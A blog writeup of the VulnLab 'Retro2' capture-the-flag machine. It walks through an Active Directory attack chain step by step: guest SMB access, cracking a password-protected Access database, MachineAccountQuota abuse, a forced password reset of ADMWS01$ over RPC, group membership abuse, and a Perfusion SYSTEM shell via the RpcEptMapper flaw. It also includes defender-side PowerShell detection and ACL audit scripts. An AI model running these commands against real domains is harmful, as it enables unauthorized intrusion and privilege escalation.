Vulnlab - Retro2 Writeup

Liam Geyer

👾 Machine Overview

This is a writeup of the machine Retro2 from VulnLab. It's an Easy difficulty Windows machine which featured xyz techniques.

🔍 Enumeration

I started off with an Nmap scan of the box:

nmap -sV -sC -Pn 10.10.80.214

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-28 13:00 EST
Stats: 0:00:59 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 81.25% done; ETC: 13:02 (0:00:12 remaining)
Stats: 0:01:04 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 81.25% done; ETC: 13:02 (0:00:13 remaining)
Nmap scan report for 10.10.80.214
Host is up (0.13s latency).
Not shown: 984 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15F75) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15F75)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-28 18:01:01Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro2.vl, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2008 R2 Datacenter 7601 Service Pack 1 microsoft-ds (workgroup: RETRO2)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro2.vl, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2024-12-28T18:02:31+00:00; -12s from scanner time.
| ssl-cert: Subject: commonName=BLN01.retro2.vl
| Not valid before: 2024-08-16T11:25:28
|_Not valid after: 2025-02-15T11:25:28
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: BLN01; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-time:
| date: 2024-12-28T18:01:52
|_ start_date: 2024-12-28T17:56:44
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
|_clock-skew: mean: -15m10s, deviation: 29m57s, median: -12s
| smb-os-discovery:
| OS: Windows Server 2008 R2 Datacenter 7601 Service Pack 1 (Windows Server 2008 R2 Datacenter 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: BLN01
| NetBIOS computer name: BLN01\x00
| Domain name: retro2.vl
| Forest name: retro2.vl
| FQDN: BLN01.retro2.vl
|_ System time: 2024-12-28T19:01:56+01:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 108.93 seconds

Looks like just generic Windows slop. I'll start by checking out SMB, and adding BLN01.retro2.vl and retro2.vl to my /etc/hosts file.

📂 SMB

smbmap -H 10.10.80.214 -u "Guest" -p ""

SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans
https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)

[+] IP: 10.10.80.214:445 Name: 10.10.80.214 Status: Authenticated
Disk        Permissions  Comment
----        -----------  -------
ADMIN$      NO ACCESS    Remote Admin
C$          NO ACCESS    Default share
IPC$        NO ACCESS    Remote IPC
NETLOGON    NO ACCESS    Logon server share
Public      READ ONLY
SYSVOL      NO ACCESS    Logon server share
[*] Closed 1 connections

Looks like we can read the Public share.

smbclient -N '\\BLN01.retro2.vl\Public'

Within the DB folder, I was able to pull an Access database file, staff.accdb.

Since I work on a Linux machine, I tried about five different ways of converting this to a CSV or some other format I could read, but none of them worked.

Checking it out on a Windows box, it's because the database is password protected.

Database Password Prompt

I used office2john to grab a crackable hash for the file.

python3 ~/GitHub/john/run/office2john.py ./staff.accdb
staff.accdb:$office$*2013*100000*256*16*[SNIPPED]

It cracked with rockyou.

john office.hash --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (Office, 2007/2010/2013 [SHA1 128/128 AVX 4x / SHA512 128/128 AVX 2x AES])
Cost 1 (MS Office version) is 2013 for all loaded hashes
Cost 2 (iteration count) is 100000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:17 0.02% (ETA: 14:41:44) 0g/s 227.2p/s 227.2c/s 227.2C/s leigh..tripleh
[SNIPPED] (staff.accdb)
1g 0:00:00:20 DONE (2024-12-30 17:09) 0.04816g/s 221.9p/s 221.9c/s 221.9C/s diamante..[SNIPPED]
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Within the DB we can see cleartext credentials for the ldapreader account.

Ldapreader Credentials

Next, I used those credentials to run Bloodhound.

bloodhound-python -d retro2.vl -u ldapreader -p [PASSWORD] -ns [IP] -c all --zip

Bloodhound Path

There's a fairly long path through AD here, but our first steps look like: create a new machine account, abuse GenericWrite over ADMWS01, and then get into the Services group so we can RDP/WinRM into the target machine.

🥈 User

I started off by checking the MAQ to see if we could in fact make a new workstation.

nxc ldap BLN01.retro2.vl -u ldapreader -p [PASSWORD] -M maq
SMB 10.10.96.90 445 BLN01 [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
LDAP 10.10.96.90 389 BLN01 [+] retro2.vl\ldapreader:[PASSWORD]
MAQ 10.10.96.90 389 BLN01 [*] Getting the MachineAccountQuota
MAQ 10.10.96.90 389 BLN01 MachineAccountQuota: 10

The MAQ was ten, so I made a new workstation.

# Using Impacket to make a new machine account
addcomputer.py -computer-name 'giganator$' -computer-pass 'Password123' -dc-host [DC-IP] -domain-netbios retro2.vl 'retro2.vl/ldapreader:[PASSWORD]'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Successfully added machine account giganator$ with password Password123.

Next we need to abuse GenericWrite over the admin workstation. I tried RBCD but wasn't successful, and couldn't set shadow credentials since there's no PKINIT available for authentication. I pivoted to changing the account's password over RPC instead.

net rpc password 'ADMWS01$' Password123 -U 'retro2.vl/giganator$%Password123' -S BLN01.retro2.vl

This worked, and we can now add ADMWS01$ (which we control) to the Services group.

net rpc group addmem "Services" "ADMWS01$" -U 'retro2.vl/ADMWS01$%Password123' -S BLN01.retro2.vl

Now finally we can RDP to the target machine, which was running Windows Server 2008 R2 Datacenter - what a throwback.

Retro Flag

That lets us grab the flag in the root of the C drive :)
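A defender's view of the chain above, as an added example that is not from the original writeup: a PowerShell query that pulls the Security-log events a domain controller records for each step (a computer account created under the MachineAccountQuota, a password reset against a computer account, and a computer account added to a group). It assumes it is run on the DC, or with event-log read rights against it via -ComputerName; the event IDs are the standard Windows ones.

```powershell
# Added example (not from the writeup): hunt a DC's Security log for the three steps used above.
# 4741 = computer account created (MAQ use by an ordinary user),
# 4724 = password reset attempted on an account (here: ADMWS01$ reset by another machine account),
# 4728/4732/4756 = member added to a global/local/universal group (here: ADMWS01$ into Services).
param(
    [int]$Hours = 24,
    [string]$ComputerName = $env:COMPUTERNAME   # assumption: run on the DC, or point this at it
)

$ids = @{
    4741 = 'Computer account created'
    4724 = 'Password reset attempted'
    4728 = 'Member added to global group'
    4732 = 'Member added to local group'
    4756 = 'Member added to universal group'
}

$filter = @{
    LogName   = 'Security'
    Id        = @($ids.Keys)
    StartTime = (Get-Date).AddHours(-$Hours)
}

Get-WinEvent -ComputerName $ComputerName -FilterHashtable $filter -ErrorAction SilentlyContinue |
ForEach-Object {
    # Read the named EventData fields from the event XML; positional Properties differ per event ID
    $xml = [xml]$_.ToXml()
    $d = @{}
    foreach ($n in $xml.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }

    $isGroupEvent = $_.Id -in 4728, 4732, 4756
    # Group events carry the new member's DN in MemberName and the group in TargetUserName;
    # 4741/4724 carry the affected account in TargetUserName.
    $target = if ($isGroupEvent) { $d['MemberName'] } else { $d['TargetUserName'] }

    # 4724 also fires for ordinary user resets; keep only resets of machine accounts ($ suffix)
    if ($_.Id -eq 4724 -and $target -notmatch '\$$') { return }

    [pscustomobject]@{
        Time   = $_.TimeCreated
        Id     = $_.Id
        What   = $ids[$_.Id]
        Actor  = '{0}\{1}' -f $d['SubjectDomainName'], $d['SubjectUserName']
        Target = $target
        Group  = if ($isGroupEvent) { $d['TargetUserName'] } else { '' }
    }
} | Sort-Object Time | Format-Table -AutoSize
```

In the chain from this box the Actor column would show a freshly created machine account (giganator$) resetting ADMWS01$ and then ADMWS01$ adding itself to Services; a machine account acting on another machine account is the signal worth alerting on, and setting ms-DS-MachineAccountQuota to 0 removes the first step entirely.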

🥇 RpcEptMapper Vulnerability

The version of Windows the target machine is running is affected by a known local privilege escalation bug in Windows 7, Windows Server 2008 R2, Windows 8, and Windows Server 2012: the permissions on the RpcEptMapper and DnsCache service registry keys allow a regular user to get a DLL loaded as SYSTEM.

This can be detected with PrivescCheck, and there's a tool, Perfusion, for exploiting it.
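As an added example (not from the writeup, and not PrivescCheck's or Perfusion's own code), an audit script that reports any non-administrative principal holding write rights on the two service keys named above; the list of trusted identities is an assumption for a default Windows install.

```powershell
# Added example (not from the writeup, PrivescCheck or Perfusion): report non-administrative
# principals that can write to the two service keys named above. Write rights there for a
# low-privileged identity are the misconfiguration the post describes; only the identities
# in $trusted are expected to hold them.
$keys = 'HKLM:\SYSTEM\CurrentControlSet\Services\RpcEptMapper',
        'HKLM:\SYSTEM\CurrentControlSet\Services\DnsCache'

# Assumption: the principals that legitimately have write access on a stock install
$trusted = 'NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators',
           'NT SERVICE\TrustedInstaller', 'CREATOR OWNER'

# Rights that let a caller add or change content under the key. ReadKey/WriteKey are deliberately
# left out of this mask: both include the ReadPermissions bit and would make read-only ACEs match.
$writeMask = [System.Security.AccessControl.RegistryRights]'CreateSubKey, SetValue, ChangePermissions, TakeOwnership'

function Test-ServiceKeyAcl {
    param([string]$Path)
    $acl = Get-Acl -Path $Path
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($trusted -contains $ace.IdentityReference.Value) { continue }
        # Bitwise test so that FullControl, which contains every bit in the mask, is caught too
        if (($ace.RegistryRights -band $writeMask) -ne 0) {
            [pscustomobject]@{
                Key       = $Path
                Identity  = $ace.IdentityReference.Value
                Rights    = $ace.RegistryRights
                Inherited = $ace.IsInherited
            }
        }
    }
}

$findings = foreach ($k in $keys) { Test-ServiceKeyAcl -Path $k }
if ($findings) {
    Write-Warning 'Unexpected write rights on RpcEptMapper/DnsCache; this host is likely affected.'
    $findings | Format-Table -AutoSize
} else {
    'No unexpected write rights on RpcEptMapper or DnsCache.'
}
```

A hit for BUILTIN\Users or NT AUTHORITY\Authenticated Users with CreateSubKey is the condition to fix; the remediation is the vendor update for the affected OS versions, or removing that ACE from both keys where patching is not possible.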

To get this to work I had to compile the tool, and then I ran it to grab a SYSTEM shell.

# Using Perfusion to get an interactive shell as NT AUTHORITY\SYSTEM
.\Perfusion.exe -c cmd -i

Perfusion Admin Shell

I was able to use this shell to grab the admin flag - yippee!

📖 Resources

🔗 Hyperlink      ℹ️ Info
Perfusion         Tool to exploit the RpcEptMapper vulnerability
PrivescCheck      Windows privesc script
Cybersec Notes    Perfusion notes
  • Title: Vulnlab - Retro2 Writeup
  • Author: Liam Geyer
  • Created at: 2025-05-17 00:00:00
  • Updated at: 2025-05-26 13:49:34
  • Link: https://lfgberg.org/2025/05/17/vulnlab/retro2/
  • License: This work is licensed under CC BY-NC-SA 4.0.